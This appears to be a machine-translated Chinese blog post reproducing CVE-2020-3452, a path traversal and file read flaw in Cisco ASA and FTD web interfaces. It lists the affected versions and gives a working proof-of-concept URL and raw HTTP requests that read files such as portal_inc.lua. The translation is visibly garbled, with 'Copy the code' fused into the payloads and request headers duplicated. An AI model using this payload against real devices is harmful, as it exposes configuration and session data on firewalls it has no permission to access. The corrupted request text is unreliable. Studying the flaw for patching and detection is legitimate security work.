CISCO ASA Arbitrary File Read Vulnerability Reappears (CVE-2020-3452)


I. Vulnerability Description:

Cisco Adaptive Security Appliance (ASA)

The Web management interfaces of firewall devices and Cisco Firepower Threat Defense (FTD) devices have unauthorized directory traversal vulnerabilities and remote arbitrary file reading vulnerabilities. An attacker can only view files in the Web directory, but cannot access files outside the web directory. This vulnerability can view configuration information, cookies, and so on of webVpn devices.

Second, the scope of influence

The following are the system versions affected by the CVE-2020-3452 vulnerability:

Cisco ASA devices

The < 9.6.1

9.6 < 9.6.4.42

9.71

9.8 < 9.8.4.20

9.9 < 9.9.2.74

9.10 < 9.10.1.42

9.12 < 9.12.3.12

9.13 < 9.13.1.10

9.14 < 9.14.1.10

Cisco FTD devices affected versions:

6.2.2

6.2.3 < 6.2.3.16

6.3.0 < Migrate to 6.4.0.9 + Hot Fix or to 6.6.0.1

6.4.0 < 6.4.0.9 + Hot Fix

< Migrate to 6.6.0.1 or 6.5.0.4 + Hot Fix (August 2020)

6.6.0 < 6.6.0.1

Third, vulnerability recurrence

POC:

/+CSCOT+/translation-table? type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=.. /Copy the code

Detailed packet

GET /+CSCOT+/translation-table? type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=.. / HTTP/1.1 Host: 127.0.0.1 Connection: close cache-control: max-age=0 upgrade-insecure -Requests: 1 user-agent: 127.0.0.1 Connection: close cache-control: max-age=0 upgrade-insecure -Requests: 1 user-agent: Mozilla / 5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3494.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml; Q = 0.9, image/webp image/apng, * / *; Q = 0.8 Accept - Language: useful - CN, useful; Q = 0.9 cookies: webvpnlogin = 1; webvpnLang=enCopy the code

GET /+CSCOT+/translation-table? type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=.. / HTTP/1.1 Host: 127.0.0.1 Content-length: 2Copy the code

Core path access is OK

Direct access means downloading the file to be accessed:

Reference:

Mp.weixin.qq.com/s/zm0NXfBQL…

www.cnblogs.com/potatsoSec/…

www.venustech.com.cn/article/1/1…


Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!

Subscribe for more revisited articles and study notes

thelostworld

Safe road, side by side with you !!!!

Personal knowledge: www.zhihu.com/people/fu-w…

Brief personal book: www.jianshu.com/u/bf0e38a8d…

Personal CSDN: blog.csdn.net/qq\_3760279…